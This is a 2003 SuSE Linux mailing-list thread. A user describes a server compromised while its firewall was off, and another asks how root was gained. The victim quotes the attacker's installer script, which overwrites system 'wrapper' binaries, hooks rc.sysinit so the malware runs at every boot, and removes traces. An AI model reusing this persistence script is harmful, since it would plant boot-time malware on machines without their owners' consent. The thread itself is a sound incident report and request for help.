I am a little puzzled about this attack. To take sendmail, in my system - 8.0 - the permissions and ownership for sendmail are: -r-xr-sr-x 1 root mail As I understand matters, to overwrite sendmail as configured above requires root access, and the directory in which it is kept ( /sbin ) is only root writeable. How can a process gain root access unless it exploits a process or program that runs under root? Was someone able to telnet or ssh in and then switch user to root? Perhaps the experts can enlighten us. Basil Fowler On Friday 13 Jun 2003 14:18, Peter Gloor wrote:
Unfortunately I left SuSE Linux 8.0 Professional Server open tonight. SuSE Firewall 2 was temporarely deactivated.
At 2 PM somebody from outside managed to implantinate a virus (dir /mihai and files like /.mihai, /mihai.tgz, /mihai/inst etc.). At the same time /etc/rc.d/rc.sysinit was been over- written (with a call to wrapper) and the files /usr/bin/wrapper as well as /usr/sbin/wrapper have been overwritten with the code of /mihai.
I'm not sure but it looks like other files have been affected as well (sendmail has gotten a date of tonight and is much larger than the original sendmail).
Before I rebooted the server I removed /usr/bin/wrapper and /usr/sbin/wrapper.
Now, the server will no longer boot. After mounting the file systems (reiserfs) the following messages appears: mounting local filesystems proc on /proctyp proc (rw)
Then the server hangs. How can I get the server up again?
It doesn't matter to me if I have to reinstall all software as long as I don't need to distroy my partitions and, more important, the file system on hda3, since I have a backup of all important config files and all datafiles on hda3.
I tried to reinstall from CD, but this doesn't work too (options freely translated from German):
- New Install Will create new partitions and overwirte my HD!?!
- Update existing system Does not boot (same as normal boot from disk)
- Start installes system Does not boot (same as normal boot from disk)
What can I do? Any hints are welcome.
This is how /mihai/inst looks like: --------------------------------------------------------------- #/bin/bash
echo "Start Daemon" sleep 1 ./kill
cp -f mihai /usr/bin/wrapper cp -f mihai /usr/sbin/wrapper
sleep 1 wrapper
chattr -AacdisSu /etc/rc.d/rc.sysinit echo >>/etc/rc.d/rc.sysinit "#Start Wrapper" echo >>/etc/rc.d/rc.sysinit wrapper
sleep 1 rm -rf mihai.tgz rm -rf mihai
echo "Done" ---------------------------------------------------------------
Does anybody know this virus?
Peter
-- Check the headers for your unsubscription address For additional commands send e-mail to suse-linux-e-help@suse.com Also check the archives at http://lists.suse.com Please read the FAQs: suse-linux-e-faq@suse.com